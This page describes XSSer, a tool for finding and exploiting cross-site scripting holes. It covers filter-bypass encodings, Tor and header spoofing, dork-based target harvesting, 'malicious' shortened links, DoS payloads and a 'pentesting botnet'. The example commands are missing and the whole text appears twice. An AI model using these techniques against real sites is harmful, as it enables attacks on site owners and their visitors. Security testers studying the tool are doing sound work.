Introduction
Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.
Usage
Options:
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):
*Miscellaneous*:
Examples
If you have interesting examples of usage about XSSer, please send an email to the mailing list.
-------------------
* Simple injection from URL:
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
-------------------
* Simple injection from URL, using POST, with statistics results:
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)
* Examples online:
-------------------
* Create a .swf movie with XSS code injected
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly
ScreenShots:
Download:http://xsser.sourceforge.net/#download
Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.
Usage
Options:
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):
*Miscellaneous*:
Examples
If you have interesting examples of usage about XSSer, please send an email to the mailing list.
-------------------
* Simple injection from URL:
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
-------------------
* Simple injection from URL, using POST, with statistics results:
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)
* Examples online:
-------------------
* Create a .swf movie with XSS code injected
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly
ScreenShots:
Download:http://xsser.sourceforge.net/#download
No comments:
Post a Comment